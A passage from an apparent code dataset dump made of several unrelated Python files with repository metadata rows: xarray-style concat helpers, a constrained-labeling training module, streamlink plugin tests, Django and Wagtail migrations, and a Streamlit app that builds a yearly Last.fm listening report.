        concatenated dimension; when omitted, objects are concatenated in
        the provided order.
    shortcut : bool, optional
        Internal speed-up for groupby operations: skips some internal
        consistency checks between the arrays being concatenated.
    combine_attrs : {"drop", "identical", "no_conflicts", "drop_conflicts", \
                     "override"}, default: "override"
        How to combine attrs of the merged objects:

        - "drop": empty attrs on returned Dataset.
        - "identical": all attrs must be the same on every object.
        - "no_conflicts": attrs are combined; same-named attrs must agree.
        - "drop_conflicts": attrs are combined; same-named attrs with
          different values are dropped.
        - "override": skip comparing and copy attrs from the first dataset.

    Returns
    -------
    stacked : Variable
        Concatenated Variable formed by stacking all the supplied variables
        along the given dimension.
    """
    variables = list(variables)
    # dispatch to IndexVariable.concat only when every input is an index;
    # otherwise fall back to the generic Variable implementation
    if all(isinstance(v, IndexVariable) for v in variables):
        concat_cls = IndexVariable
    else:
        concat_cls = Variable
    return concat_cls.concat(variables, dim, positions, shortcut, combine_attrs)
def assert_unique_multiindex_level_names(variables):
    """Check for uniqueness of MultiIndex level names in all given
    variables.

    Not public API. Used for checking consistency of DataArray and Dataset
    objects.

    :param variables: mapping of variable name -> variable
    :raises ValueError: when two variables expose the same MultiIndex level
        name, or when a level name collides with a dimension name
    """
    level_names = defaultdict(list)
    all_level_names = set()
    for var_name, var in variables.items():
        if isinstance(var._data, PandasIndex):
            idx_level_names = var.to_index_variable().level_names
            if idx_level_names is not None:
                for n in idx_level_names:
                    level_names[n].append(f"{n!r} ({var_name})")
            if idx_level_names:
                all_level_names.update(idx_level_names)
    for k, v in level_names.items():
        # a level name that is also a variable name counts as a conflict too
        if k in variables:
            v.append(f"({k})")
    duplicate_names = [v for v in level_names.values() if len(v) > 1]
    if duplicate_names:
        conflict_str = "\n".join(", ".join(v) for v in duplicate_names)
        raise ValueError(f"conflicting MultiIndex level name(s):\n{conflict_str}")
    # Check confliction between level names and dimensions GH:2299
    for k, v in variables.items():
        for d in v.dims:
            if d in all_level_names:
                # f-string for consistency with the messages above
                raise ValueError(
                    f"conflicting level / dimension names. {d} "
                    "already exists as a level name."
                )
| 36.763875 | 124 | 0.590678 |
ace09d675eac85450da123ef76aa6a06f5ed5dce | 3,371 | py | Python | train_CLL.py | VTCSML/Constrained-Labeling-for-Weakly-Supervised-Learning | 9a248e92cdecd17e9799a6cd3a4f1978e2c794ef | [
"MIT"
] | 2 | 2021-06-23T22:50:21.000Z | 2021-08-03T05:17:39.000Z | train_CLL.py | VTCSML/Constrained-Labeling-for-Weakly-Supervised-Learning | 9a248e92cdecd17e9799a6cd3a4f1978e2c794ef | [
"MIT"
] | null | null | null | train_CLL.py | VTCSML/Constrained-Labeling-for-Weakly-Supervised-Learning | 9a248e92cdecd17e9799a6cd3a4f1978e2c794ef | [
"MIT"
] | null | null | null | import numpy as np
def bound_loss(y, a_matrix, bounds):
    """
    Computes how far each weak-supervision constraint is from its bound
    (positive entries indicate violation of the <= constraint).

    :param y: size (num_data, num_class) of estimated labels for the data
    :type y: ndarray
    :param a_matrix: size (num_weak, num_data, num_class) of a constraint matrix
    :type a_matrix: ndarray
    :param bounds: size (num_weak, num_class) of the bounds for the constraint
    :type bounds: ndarray
    :return: constraint values minus their bounds, size (num_weak, num_class)
    :rtype: ndarray
    """
    # sum_j A[i, j, :] * y[j, :] for every weak signal i, computed as one
    # vectorized reduction instead of a Python loop; dtype=float preserves
    # the float output the original np.zeros accumulator produced.
    constraint = (a_matrix * y).sum(axis=1, dtype=float)
    return constraint - bounds
def y_gradient(y, constraint_set):
    """
    Computes the gradient of the quadratic constraint penalty w.r.t. y.

    :param y: size (num_data, num_class) current label estimates (unused by
        the formula itself; the gradient depends on the cached bound losses)
    :param constraint_set: dict holding, for every name listed under
        constraint_set['constraints'], a constraint matrix 'A' of size
        (num_weak, num_data, num_class) and its cached 'bound_loss' of size
        (num_weak, num_class)
    :return: gradient, broadcastable to y's shape
    :rtype: ndarray
    """
    gradient = 0
    for key in constraint_set['constraints']:
        current_constraint = constraint_set[key]
        a_matrix = current_constraint['A']
        # renamed from `bound_loss` so the local no longer shadows the
        # module-level bound_loss() function
        losses = current_constraint['bound_loss']
        for constraint, loss in zip(a_matrix, losses):
            # d/dy of (A.y - b)^2 contributes 2 * A * loss per weak signal
            gradient += 2 * constraint * loss
    return gradient
def run_constraints(y, rho, constraint_set, iters=300, enable_print=False):
    """Project label estimates toward satisfying the constraints with
    Adagrad-style gradient steps (CLL inner loop).

    :param y: size (num_data, num_class) initial label estimates
    :type y: ndarray
    :param rho: penalty parameter; retained for interface compatibility but
        not used by the update rule (the original immediately clobbered it
        with ``rho = n`` and then never read it)
    :param constraint_set: dict holding, for every name listed under
        constraint_set['constraints'], a constraint matrix 'A' and bounds
        'b'.  Updated in place with per-constraint 'bound_loss' and a
        'violation' summary.
    :param iters: number of gradient iterations
    :param enable_print: when True, print per-iteration violation norms
    :return: projected label estimates, clipped to [0, 1]
    :rtype: ndarray
    """
    constraint_keys = constraint_set['constraints']
    grad_sum = 0
    for iteration in range(iters):
        print_constraints = [iteration]
        print_builder = "Iteration %d, "
        constraint_viol = []
        viol_text = ''
        for key in constraint_keys:
            current_constraint = constraint_set[key]
            a_matrix = current_constraint['A']
            bounds = current_constraint['b']
            # get bound loss for constraint
            loss = bound_loss(y, a_matrix, bounds)
            # cache the loss so y_gradient can reuse it this iteration
            constraint_set[key]['bound_loss'] = loss
            # only positive entries violate the (<=) constraint
            violation = np.linalg.norm(loss.clip(min=0))
            print_builder += key + "_viol: %.4e "
            print_constraints.append(violation)
            viol_text += key + "_viol: %.4e "
            constraint_viol.append(violation)
        # Adagrad update: per-element step size 1/sqrt(sum of squared grads)
        y_grad = y_gradient(y, constraint_set)
        grad_sum += y_grad**2
        y = y - y_grad / np.sqrt(grad_sum + 1e-8)
        y = np.clip(y, a_min=0, a_max=1)
        constraint_set['violation'] = [viol_text, constraint_viol]
        if enable_print:
            print(print_builder % tuple(print_constraints))
    return y
def train_algorithm(constraint_set):
    """
    Trains CLL algorithm

    :param constraint_set: dictionary containing error constraints of the weak signals
    :return: average of learned labels over several trials
    :rtype: ndarray
    """
    constraint_set['constraints'] = ['error']
    weak_signals = constraint_set['weak_signals']
    assert len(weak_signals.shape) == 3, "Reshape weak signals to num_weak x num_data x num_class"
    _, num_data, num_class = weak_signals.shape
    # random initial label estimates, shared across the trials
    y_init = np.random.rand(num_data, num_class)
    rho = 0.1
    num_trials = 3
    trial_labels = [run_constraints(y_init, rho, constraint_set) for _ in range(num_trials)]
    return np.mean(trial_labels, axis=0)
| 31.504673 | 99 | 0.619104 |
ace09d68ed2ffc904880be6cb311d0b8d1dd492a | 2,022 | py | Python | tests/test_plugins.py | xcgx/streamlink | b635e0d9d0fe9363817a96ec7d31faefed95cb57 | [
"BSD-2-Clause"
] | 10 | 2017-04-10T18:25:41.000Z | 2021-09-15T20:14:58.000Z | tests/test_plugins.py | xcgx/streamlink | b635e0d9d0fe9363817a96ec7d31faefed95cb57 | [
"BSD-2-Clause"
] | 9 | 2020-04-04T09:49:52.000Z | 2020-04-21T01:52:02.000Z | tests/test_plugins.py | xcgx/streamlink | b635e0d9d0fe9363817a96ec7d31faefed95cb57 | [
"BSD-2-Clause"
] | 4 | 2017-03-17T12:28:27.000Z | 2018-01-11T21:14:32.000Z | import os.path
import pkgutil
import unittest
import streamlink.plugins
from streamlink.plugin.plugin import Matcher, Plugin
from streamlink.utils.module import load_module
class PluginTestMeta(type):
    """Metaclass that generates one ``test_<plugin>_load`` method per module
    found in the streamlink.plugins package directory."""
    def __new__(mcs, name, bases, dict):
        # NOTE(review): the parameter name ``dict`` shadows the builtin; kept
        # as-is because renaming would change the metaclass signature.
        plugin_path = os.path.dirname(streamlink.plugins.__file__)
        def gentest(plugin):
            # Closure factory: binds the loaded plugin module into a fresh
            # test method asserting the Plugin API contract.
            def load_plugin_test(self):
                assert hasattr(plugin, "__plugin__"), "It exports __plugin__"
                pluginclass = plugin.__plugin__
                assert issubclass(plugin.__plugin__, Plugin), "__plugin__ is an instance of the Plugin class"
                classname = pluginclass.__name__
                assert classname == classname[0].upper() + classname[1:], "__plugin__ class name starts with uppercase letter"
                assert "_" not in classname, "__plugin__ class name does not contain underscores"
                assert isinstance(pluginclass.matchers, list) and len(pluginclass.matchers) > 0, "Has at least one matcher"
                assert all(isinstance(matcher, Matcher) for matcher in pluginclass.matchers), "Only has valid matchers"
                assert not hasattr(pluginclass, "can_handle_url"), "Does not implement deprecated can_handle_url(url)"
                assert not hasattr(pluginclass, "priority"), "Does not implement deprecated priority(url)"
                assert callable(pluginclass._get_streams), "Implements _get_streams()"
            return load_plugin_test
        pname: str
        for finder, pname, ispkg in pkgutil.iter_modules([plugin_path]):
            # shared helper modules are not plugins themselves
            if pname.startswith("common_"):
                continue
            plugin_module = load_module(f"streamlink.plugins.{pname}", plugin_path)
            dict[f"test_{pname}_load"] = gentest(plugin_module)
        return type.__new__(mcs, name, bases, dict)
class TestPlugins(unittest.TestCase, metaclass=PluginTestMeta):
    """
    Test that each plugin can be loaded and conforms to the Plugin API;
    the individual test methods are generated by PluginTestMeta.
    """
ace09da6d1925a8925583e87ca750795a5c49c1d | 470 | py | Python | worknow/core/migrations/0004_auto_20170620_0314.py | projetos-ufpi/Base_DJANGO | e17b8c5427451fb3a6242351beeef1cb5f196cac | [
"Apache-2.0"
] | null | null | null | worknow/core/migrations/0004_auto_20170620_0314.py | projetos-ufpi/Base_DJANGO | e17b8c5427451fb3a6242351beeef1cb5f196cac | [
"Apache-2.0"
] | null | null | null | worknow/core/migrations/0004_auto_20170620_0314.py | projetos-ufpi/Base_DJANGO | e17b8c5427451fb3a6242351beeef1cb5f196cac | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-06-20 06:14
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0003_auto_20170618_2238'),
]
operations = [
migrations.AlterField(
model_name='userprofile',
name='biografia',
field=models.CharField(default=b'', max_length=250),
),
]
| 22.380952 | 64 | 0.621277 |
ace09dc80516719430c6c8728f8eedfcc0c3caa6 | 1,960 | py | Python | hypha/public/standardpages/migrations/0005_add_more_block.py | maxpearl/hypha | e181ebadfb744aab34617bb766e746368d6f2de0 | [
"BSD-3-Clause"
] | 20 | 2021-04-08T16:38:49.000Z | 2022-02-09T20:05:57.000Z | hypha/public/standardpages/migrations/0005_add_more_block.py | maxpearl/hypha | e181ebadfb744aab34617bb766e746368d6f2de0 | [
"BSD-3-Clause"
] | 1,098 | 2017-12-15T11:23:03.000Z | 2020-01-24T07:58:07.000Z | hypha/public/standardpages/migrations/0005_add_more_block.py | maxpearl/hypha | e181ebadfb744aab34617bb766e746368d6f2de0 | [
"BSD-3-Clause"
] | 17 | 2020-02-07T14:55:54.000Z | 2021-04-04T19:32:38.000Z | # Generated by Django 2.2.19 on 2021-02-28 21:34
from django.db import migrations
import wagtail.core.blocks
import wagtail.core.fields
import wagtail.documents.blocks
import wagtail.embeds.blocks
import wagtail.images.blocks
import wagtail.snippets.blocks
class Migration(migrations.Migration):
    # Auto-generated Wagtail migration: redefines the StreamField block list
    # of InformationPage.body (adds the 'more' struct block alongside the
    # existing heading/paragraph/box/apply_link/image/quote/embed/
    # call_to_action/document blocks).  Do not hand-edit the field below.
    dependencies = [
        ('standardpages', '0004_add_box_apply_link_fields'),
    ]
    operations = [
        migrations.AlterField(
            model_name='informationpage',
            name='body',
            field=wagtail.core.fields.StreamField([('heading', wagtail.core.blocks.CharBlock(form_classname='full title', icon='title')), ('paragraph', wagtail.core.blocks.RichTextBlock()), ('box', wagtail.core.blocks.StructBlock([('box_content', wagtail.core.blocks.RichTextBlock()), ('box_class', wagtail.core.blocks.CharBlock(required=False))])), ('more', wagtail.core.blocks.StructBlock([('more_content', wagtail.core.blocks.RichTextBlock()), ('more_content_more', wagtail.core.blocks.RichTextBlock()), ('more_class', wagtail.core.blocks.CharBlock(required=False))])), ('apply_link', wagtail.core.blocks.StructBlock([('application', wagtail.core.blocks.PageChooserBlock())])), ('image', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock()), ('caption', wagtail.core.blocks.CharBlock(required=False))])), ('quote', wagtail.core.blocks.StructBlock([('quote', wagtail.core.blocks.CharBlock(form_classname='title')), ('attribution', wagtail.core.blocks.CharBlock(required=False)), ('job_title', wagtail.core.blocks.CharBlock(required=False))])), ('embed', wagtail.embeds.blocks.EmbedBlock()), ('call_to_action', wagtail.snippets.blocks.SnippetChooserBlock('utils.CallToActionSnippet', template='blocks/call_to_action_block.html')), ('document', wagtail.core.blocks.StructBlock([('document', wagtail.documents.blocks.DocumentChooserBlock()), ('title', wagtail.core.blocks.CharBlock(required=False))]))]),
        ),
    ]
| 78.4 | 1,436 | 0.742347 |
ace09ee752c7fa3ad559d0daa58d0e6eb9b73296 | 21,449 | py | Python | YearlyReportSTPublic.py | DonnyDew/MusicYearly | 4533626805c9aac31f9f5d2e9aa9090b3fcf09d8 | [
"MIT"
] | 1 | 2021-06-18T01:54:16.000Z | 2021-06-18T01:54:16.000Z | YearlyReportSTPublic.py | DonnyDew/MusicYearly | 4533626805c9aac31f9f5d2e9aa9090b3fcf09d8 | [
"MIT"
] | null | null | null | YearlyReportSTPublic.py | DonnyDew/MusicYearly | 4533626805c9aac31f9f5d2e9aa9090b3fcf09d8 | [
"MIT"
] | null | null | null | import requests
import time
import streamlit as st
import pandas as pd
import time
from datetime import datetime as dt
import datetime
import os
import pandas as pd
import numpy as np
import plotly.graph_objects as go
# Set up containers
# One Streamlit container per page section: header, the yearly summary, the
# top-of-each-month tables, then one container per calendar month.
header = st.beta_container()
yearlyData = st.beta_container()
topStuffData = st.beta_container()
JanuaryData = st.beta_container()
FebruaryData = st.beta_container()
MarchData = st.beta_container()
AprilData = st.beta_container()
MayData = st.beta_container()
JuneData = st.beta_container()
JulyData = st.beta_container()
AugustData = st.beta_container()
SeptemberData = st.beta_container()
OctoberData = st.beta_container()
NovemberData = st.beta_container()
DecemberData = st.beta_container()
def monthConvert(monthStr, year):
    """Map a month name to ``[month_number, days_in_month]``.

    Accepts the full month name or its 3-letter abbreviation, any case,
    mirroring the original if/elif chain.  February is sized according to
    the Gregorian leap-year rule.  Unrecognized names return ``[0, 0]``.

    :param monthStr: month name, e.g. "July" or "jul" (case-insensitive)
    :param year: calendar year, used to size February
    :return: [month number 1-12 (0 if unknown), days in month (0 if unknown)]
    """
    names = ["january", "february", "march", "april", "may", "june",
             "july", "august", "september", "october", "november", "december"]
    lengths = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
    key = monthStr.lower()
    for index, name in enumerate(names):
        # match either the full name or the first three letters
        if key == name or key == name[:3]:
            month = index + 1
            daysInMonth = lengths[index]
            if month == 2 and (year % 4 == 0 and (year % 100 != 0 or year % 400 == 0)):
                daysInMonth = 29  # leap-year February
            return [month, daysInMonth]
    return [0, 0]  # unknown month name, same sentinel as the original
def getYearUniTime(yearList):
    """Ask the user for a reporting mode and return the chosen time window
    as ``[start, end]`` unix timestamps formatted as strings.

    Mode 1: start of the current year until now.
    Mode 2: a full previous year chosen from *yearList* (falls back to
        mode 1 when there are no previous years).
    Mode 3: arbitrary start/end dates picked in the UI.

    Bug fixed: the original checked ``mode == 2`` *after* the mode-1 branch,
    so an empty yearList set ``mode = 1`` too late and the function raised
    NameError on the unset time range.  The fallback now happens up front.
    """
    st.write("Mode 1: Current Year Data")
    st.write("Mode 2: Previous Year")
    st.write("Mode 3: Custom Time Frame")
    mode = int(st.selectbox("Choose mode 1-3", [1, 2, 3]))
    if mode == 2 and len(yearList) == 0:
        st.write("No data from previous years... displaying current year")
        mode = 1
    if mode == 1:
        today = dt.today()
        year = today.year
        timeStart = time.mktime(datetime.datetime(year, 1, 1, 0, 0, 0).timetuple())
        timeEnd = time.time()
    elif mode == 2:
        year = st.selectbox("Enter year", yearList)
        timeStart = time.mktime(datetime.datetime(year, 1, 1, 0, 0, 0).timetuple())
        timeEnd = time.mktime(datetime.datetime(year, 12, 31, 23, 59, 59).timetuple())
    else:
        timeStart = time.mktime(st.date_input("Start Date").timetuple())
        timeEnd = time.mktime(st.date_input("End Date").timetuple())
    # round to whole seconds and return as strings, as callers expect
    return [format(timeStart, ".0f"), format(timeEnd, ".0f")]
def getUserData(pictureOrSTime):
    """Fetch the Last.fm profile of USER_AGENT and return either the profile
    picture URL (``pictureOrSTime == 'picture'``) or the registration year."""
    params = {
        'method': 'user.getInfo',
        'user': USER_AGENT,
        'api_key': API_KEY,
        'format': 'json',
    }
    response = requests.get('http://ws.audioscrobbler.com/2.0/',
                            headers={"user-agent": USER_AGENT}, params=params)
    data = response.json()
    if pictureOrSTime == 'picture':
        return data['user']['image'][2]['#text']
    # registration timestamp -> "YYYY-..." string -> year as int
    timestamp = data['user']['registered']['#text']
    return int(str(dt.fromtimestamp(timestamp))[:4])
def lastfm_weeklyChart(timeList, method):
    """Call one of the user.getWeekly*Chart Last.fm API methods over the
    [from, to] unix-timestamp window in *timeList* and return parsed JSON."""
    params = {
        'method': method,
        'user': USER_AGENT,
        'api_key': API_KEY,
        'format': 'json',
        'from': timeList[0],
        'to': timeList[1],
    }
    headers = {"user-agent": USER_AGENT}
    response = requests.get('http://ws.audioscrobbler.com/2.0/',
                            headers=headers, params=params)
    return response.json()
# Last.fm credentials: API key from the environment, username typed in the UI.
API_KEY = str(os.environ.get('LASTFM_API_KEY')) #Environmental Variable to protect my API key
USER_AGENT = st.text_input("Enter Last Fm User Name")
if USER_AGENT != "":
    # build the list of complete years between registration and the
    # current year (exclusive), then let the user pick a time window
    yearRegistered = getUserData('STime')
    countYear = yearRegistered
    today = dt.today()
    dateM = str(dt(today.year, today.month, 1))
    year = int(dateM[0:4])
    yearList = []
    while year > countYear:
        yearList.append(countYear)
        countYear += 1
    timeList = getYearUniTime(yearList)
    st.write("wait for mode option before clicking")
    continue_button = st.button("Press when ready")
    if continue_button == True:
        st.write("Loading . . .")
        # the report year is derived from the chosen window's start time
        almost_year = time.ctime(int(timeList[0]))
        year = int(almost_year[-4:])
        # --- yearly track chart ---
        data = lastfm_weeklyChart(timeList,'user.getWeeklyTrackChart')
        totalSongs = len(data['weeklytrackchart']['track'])
        songDict = {}
        for i in range(0,totalSongs):
            songDict[i] = {"Track":data['weeklytrackchart']['track'][i]['name'],"PlayCount":int(data['weeklytrackchart']['track'][i]['playcount'])
            ,"Artist":data['weeklytrackchart']['track'][i]['artist']['#text'],"Image":data['weeklytrackchart']['track'][i]['image'][2]['#text']}
        SongList = []
        ArtistList = []
        SongFreqList = []
        for k,v in songDict.items():
            SongList.append(songDict[k]["Track"])
            ArtistList.append(songDict[k]["Artist"])
            SongFreqList.append(songDict[k]["PlayCount"])
        data = {'Song Name' : SongList,'Artist':ArtistList,'PlayCount':SongFreqList}
        df = pd.DataFrame(data=data)
        # 1-based index so the table reads as a ranking
        df.index = np.arange(1,len(df)+1)
        #Artist Chart
        artistData = lastfm_weeklyChart(timeList,'user.getWeeklyArtistChart')
        totalArtists = len(artistData['weeklyartistchart']['artist'])
        artArtistList = []
        artistFreqList = []
        for i in range(0,totalArtists):
            artArtistList.append(artistData['weeklyartistchart']['artist'][i]['name'])
            artistFreqList.append(artistData['weeklyartistchart']['artist'][i]['playcount'])
        arData = {"Aritst Name":artArtistList,"Freq":artistFreqList}
        ar = pd.DataFrame(data=arData)
        ar.index = np.arange(1,len(ar)+1)
        #Album Chart
        albumData = lastfm_weeklyChart(timeList,'user.getWeeklyAlbumChart')
        totalAlbums = len(albumData['weeklyalbumchart']['album'])
        alAlbumList = []
        albumFreqList = []
        for i in range(0,totalAlbums):
            alAlbumList.append(albumData['weeklyalbumchart']['album'][i]['name'])
            albumFreqList.append(albumData['weeklyalbumchart']['album'][i]['playcount'])
        alData = {"Album Name":alAlbumList,"Freq":albumFreqList}
        al = pd.DataFrame(data=alData)
        al.index = np.arange(1,len(al)+1)
        #-------------------------------------------------------------------------------------
        # total scrobbles for the whole window
        totalTracksPlayed = 0
        for k,v in songDict.items():
            totalTracksPlayed += songDict[k]['PlayCount']
        #--------------------------------------------------------------------------------------
        #Picture Data
def lastfm_trackGetInfo(artist,track):
headers = {"user-agent": USER_AGENT}
url = 'http://ws.audioscrobbler.com/2.0/'
payload = {'method' : 'track.getInfo'}
payload['user'] = USER_AGENT
payload['api_key'] = API_KEY
payload['format'] = 'json'
payload["autocorrect"] = 1
payload["artist"] = artist
payload["track"] = track
payload["username"] = USER_AGENT
response = requests.get(url,headers=headers, params=payload)
return response.json()
def getpicUrl(num):
data = lastfm_trackGetInfo(songDict[num]["Artist"],songDict[num]["Track"])
picUrl = data["track"]['album']['image'][3]["#text"]
return picUrl
        #User Image
        userImage = getUserData('picture')
        #Image 1
        # Walk down the track ranking until a track with album art is found;
        # KeyError means track.getInfo had no 'album' entry for that song.
        count = 0
        try:
            image1 = getpicUrl(0)
        except KeyError:
            image1 = ""
        while len(image1) < 1 :
            try:
                image1 = getpicUrl(count+1)
                count += 1
            except KeyError:
                count += 1
        #Image 2
        # Continue from where image1 stopped; a duplicate of image1 is
        # rejected so two different covers are shown.
        try:
            image2 = getpicUrl(count+1)
            if image1 == image2: #Case for when album pic is the same
                image2 = ""
                count += 1
        except KeyError:
            image2 = ""
        while len(image2) < 1 :
            try:
                image2 = getpicUrl(count+1)
                count += 1
            except KeyError:
                count += 1
        #-----------------------------------------------------------------------------------------------------------
        #Genre Feature
def lastfm_artistGetTag(artist):
headers = {"user-agent": USER_AGENT}
url = 'http://ws.audioscrobbler.com/2.0/'
payload = {'method' : 'artist.getTopTags'}
payload['user'] = USER_AGENT
payload['api_key'] = API_KEY
payload['format'] = 'json'
payload["autocorrect"] = 1
payload["artist"] = artist
response = requests.get(url,headers=headers, params=payload)
return response.json()
        # Accumulate tag counts across the top (at most 50) artists; the top
        # five tags of each artist contribute their Last.fm 'count' weight.
        genreDic = {}
        genereCounter = 0
        for k,v in songDict.items():
            if genereCounter >= 50:
                break
            aData = lastfm_artistGetTag(songDict[k]["Artist"])
            genereCounter += 1
            for e in range(0,5):
                try:
                    count = aData['toptags']['tag'][e]['count']
                    tag = aData['toptags']['tag'][e]['name']
                    if tag in genreDic:
                        genreDic[tag] += count
                    else:
                        genreDic[tag] = count
                except IndexError:
                    # artist had fewer than 5 tags
                    break
def sortDictbyValue2(dictionary):
sorted_keys = sorted(dictionary,reverse = True,key=lambda x: (dictionary[x]))
tempDict = {}
for i in sorted_keys:
tempDict[i] = ""
tempDict2 = {}
for (k,v),(k2,v2) in zip(dictionary.items(),tempDict.items()):
tempDict2[k2] = dictionary[k2]
return tempDict2
        # Keep only the five highest-weighted genres for the pie chart.
        genreDic = sortDictbyValue2(genreDic)
        genreList = []
        genreCountList = []
        count = 0
        for k,v in genreDic.items():
            genreList.append(k)
            genreCountList.append(v)
            count += 1
            if count > 4:
                break
        genrePie = go.Figure(data=[go.Pie(labels=genreList,values=genreCountList)])
        #--------------------------------------------------------------------------------------
        # Page header and the yearly summary section.
        with header:
            st.title(f"Welcome {USER_AGENT} to your Yearly Song Report")
            try:
                st.image(userImage)
                st.write(f"Profile picture of {USER_AGENT}")
            except FileNotFoundError:
                st.write("User has no profile picture")
            st.subheader("Created by Donny Dew")
            st.write("Powered by AudioScrobbler from Last.FM")
            st.write("Last.FM URL: https://www.last.fm/")
        with yearlyData:
            st.header(f"Yearly Statistics for {USER_AGENT} in {year}")
            picol1,picol2 = st.beta_columns(2)
            picol1.image(image1)
            picol2.image(image2)
            st.dataframe(df)
            tabcol1,tabcol2 = st.beta_columns(2)
            tabcol1.dataframe(ar)
            tabcol2.dataframe(al)
            st.subheader("Genre Pie Chart")
            st.write(genrePie)
        #--------------------------------------------------------------------------------------
#Each Month Setup
def getMonthUniTime(year,month):
monthDayList = monthConvert(month,year)
timeStart = float(time.mktime(datetime.datetime(year,monthDayList[0],1,0,0,0).timetuple())) + 28800 #For CT + 21600
timeEnd = float(time.mktime(datetime.datetime(year,monthDayList[0],monthDayList[1],23,59,59).timetuple())) + 28800
timeStart = format(timeStart, ".0f")
timeEnd = format(timeEnd, ".0f")
floatTime = [timeStart,timeEnd]
return [str(floatTime) for floatTime in floatTime]
def getMonthlyTables(year,month):
timeList = getMonthUniTime(year,month)
#Tracks
trackData = lastfm_weeklyChart(timeList,'user.getWeeklyTrackChart')
totalSongs = len(trackData['weeklytrackchart']['track'])
songDict = {}
for i in range(0,totalSongs):
songDict[i] = {"Track":trackData['weeklytrackchart']['track'][i]['name'],"PlayCount":int(trackData['weeklytrackchart']['track'][i]['playcount'])
,"Artist":trackData['weeklytrackchart']['track'][i]['artist']['#text']}
totalTracks = 0
for i in range(0,totalSongs):
totalTracks += songDict[i]["PlayCount"]
SongList = []
ArtistList = []
SongFreqList = []
for i in range(0,totalSongs):
SongList.append(songDict[i]["Track"])
ArtistList.append(songDict[i]["Artist"])
SongFreqList.append(songDict[i]["PlayCount"])
tData = {'Song Name' : SongList,'Artist':ArtistList,'PlayCount':SongFreqList}
td = pd.DataFrame(data=tData)
td.index = np.arange(1,len(td)+1)
#Artists
artistData = lastfm_weeklyChart(timeList,'user.getWeeklyArtistChart')
totalArtists = len(artistData['weeklyartistchart']['artist'])
artArtistList = []
artistFreqList = []
for i in range(0,totalArtists):
artArtistList.append(artistData['weeklyartistchart']['artist'][i]['name'])
artistFreqList.append(artistData['weeklyartistchart']['artist'][i]['playcount'])
arData = {"Artist Name":artArtistList,"PlayCount":artistFreqList}
ar = pd.DataFrame(data=arData)
ar.index = np.arange(1,len(ar)+1)
#Albums
albumData = lastfm_weeklyChart(timeList,'user.getWeeklyAlbumChart')
totalAlbums = len(albumData['weeklyalbumchart']['album'])
alAlbumList = []
albumFreqList = []
for i in range(0,totalAlbums):
alAlbumList.append(albumData['weeklyalbumchart']['album'][i]['name'])
albumFreqList.append(albumData['weeklyalbumchart']['album'][i]['playcount'])
alData = {"Album Name":alAlbumList,"Freq":albumFreqList}
al = pd.DataFrame(data=alData)
al.index = np.arange(1,len(al)+1)
#Return 3 tables
return [td,ar,al,tData,arData]
def getTotalSongs(year,month):
timeList = getMonthUniTime(year,month)
#Tracks
trackData = lastfm_weeklyChart(timeList,'user.getWeeklyTrackChart')
totalSongs = len(trackData['weeklytrackchart']['track'])
totalTracks = 0
for i in range(0,totalSongs):
totalTracks += int(trackData['weeklytrackchart']['track'][i]['playcount'])
return totalTracks
        # Fetch all twelve per-month chart bundles and monthly play totals.
        theMonths = ["January","February","March","April","May","June","July","August","September","October","November","December"]
        monthTables = []
        totalSongsList = []
        for month in theMonths:
            monthTables.append(getMonthlyTables(year,month))
            totalSongsList.append(getTotalSongs(year,month))
        ts = pd.DataFrame(data=totalSongsList,index=[1,2,3,4,5,6,7,8,9,10,11,12])
        # convenience aliases, one per month, for the display blocks below
        janTables = monthTables[0]
        febTables = monthTables[1]
        marTables = monthTables[2]
        aprTables = monthTables[3]
        mayTables = monthTables[4]
        junTables = monthTables[5]
        julTables = monthTables[6]
        augTables = monthTables[7]
        sepTables = monthTables[8]
        octTables = monthTables[9]
        novTables = monthTables[10]
        decTables = monthTables[11]
        #-------------------------------------------------------------------------------------------------
def getTopSong():
Song = []
Artist = []
Plays = []
for i in range(0,12):
try:
Song.append(monthTables[i][3]['Song Name'][0])
Artist.append(monthTables[i][3]['Artist'][0])
Plays.append(monthTables[i][3]['PlayCount'][0])
except IndexError:
Song.append("-")
Artist.append("-")
Plays.append(0)
return [Song,Artist,Plays]
def getTopArtist():
Artist = []
Plays = []
for i in range(0,12):
try:
Artist.append(monthTables[i][4]['Artist Name'][0])
Plays.append(monthTables[i][4]['PlayCount'][0])
except IndexError:
Artist.append("-")
Plays.append(0)
return [Artist,Plays]
        # Build the month-by-month "top" tables and render the summary section.
        TopSongData = getTopSong()
        topData = {"Track":TopSongData[0],"Artist":TopSongData[1],"Freq":TopSongData[2]}
        tps = pd.DataFrame(data=topData,index=[1,2,3,4,5,6,7,8,9,10,11,12])
        tps2 = pd.DataFrame(data=TopSongData[2],index=[1,2,3,4,5,6,7,8,9,10,11,12])
        TopArtistData = getTopArtist()
        topAData = {"Artist":TopArtistData[0],"Freq":TopArtistData[1]}
        ta = pd.DataFrame(data=topAData,index=[1,2,3,4,5,6,7,8,9,10,11,12])
        #-------------------------------------------------------------------------------------------------
        #Displaying everything
        with topStuffData:
            st.subheader("Tracks played per month")
            st.bar_chart(ts)
            st.subheader("Top Songs from each Month")
            st.dataframe(tps)
            st.subheader("Top Artists from each Month")
            st.dataframe(ta)
            st.subheader("Top Songs Freq per month")
            st.bar_chart(tps2)
        # Twelve identical display blocks, one per month: track table, then
        # artist/album tables side by side, then the month's play total.
        with JanuaryData:
            st.header("January Data")
            st.dataframe(janTables[0])
            tabcol1,tabcol2 = st.beta_columns(2)
            tabcol1.dataframe(janTables[1])
            tabcol2.dataframe(janTables[2])
            st.write(f"Total songs played in month: {totalSongsList[0]}")
        with FebruaryData:
            st.header("February Data")
            st.dataframe(febTables[0])
            tabcol1,tabcol2 = st.beta_columns(2)
            tabcol1.dataframe(febTables[1])
            tabcol2.dataframe(febTables[2])
            st.write(f"Total songs played in month: {totalSongsList[1]}")
        with MarchData:
            st.header("March Data")
            st.dataframe(marTables[0])
            tabcol1,tabcol2 = st.beta_columns(2)
            tabcol1.dataframe(marTables[1])
            tabcol2.dataframe(marTables[2])
            st.write(f"Total songs played in month: {totalSongsList[2]}")
        with AprilData:
            st.header("April Data")
            st.dataframe(aprTables[0])
            tabcol1,tabcol2 = st.beta_columns(2)
            tabcol1.dataframe(aprTables[1])
            tabcol2.dataframe(aprTables[2])
            st.write(f"Total songs played in month: {totalSongsList[3]}")
